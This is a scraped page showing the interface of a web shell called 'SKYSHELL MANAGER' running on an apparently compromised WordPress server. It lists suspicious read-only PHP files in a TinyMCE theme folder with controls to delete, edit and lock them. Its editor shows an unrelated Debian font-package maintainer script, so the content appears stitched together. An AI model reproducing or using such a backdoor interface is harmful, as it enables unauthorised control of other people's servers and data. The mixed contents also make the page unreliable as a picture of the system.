📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: fonts-droid-fallback.postinst
#!/bin/sh set -e # Automatically added by dh_installdeb/13.3.3ubuntu3 dpkg-maintscript-helper rm_conffile /etc/fonts/conf.avail/60-droid-sans-mono-fonts.conf 1:4.3-2~ fonts-droid -- "$@" # End automatically added section # Automatically added by dh_installdeb/13.3.3ubuntu3 dpkg-maintscript-helper rm_conffile /etc/fonts/conf.avail/59-droid-serif-fonts.conf 1:4.3-2~ fonts-droid -- "$@" # End automatically added section # Automatically added by dh_installdeb/13.3.3ubuntu3 dpkg-maintscript-helper rm_conffile /etc/fonts/conf.avail/65-droid-sans-fonts.conf 1:4.4.4r2-2~ fonts-droid -- "$@" # End automatically added section # Automatically added by dh_installdeb/13.3.3ubuntu3 dpkg-maintscript-helper mv_conffile /etc/fonts/conf.avail/65-droid-sans-fallback.conf /etc/fonts/conf.avail/69-droid-sans-fallback.conf 1:4.4.4r2-6~ fonts-droid -- "$@" # End automatically added section # Automatically added by dh_installdeb/13.3.3ubuntu3 dpkg-maintscript-helper rm_conffile /etc/fonts/conf.avail/69-droid-sans-fallback.conf 1:6.0.1r3-1~ fonts-droid-fallback -- "$@" # End automatically added section
Save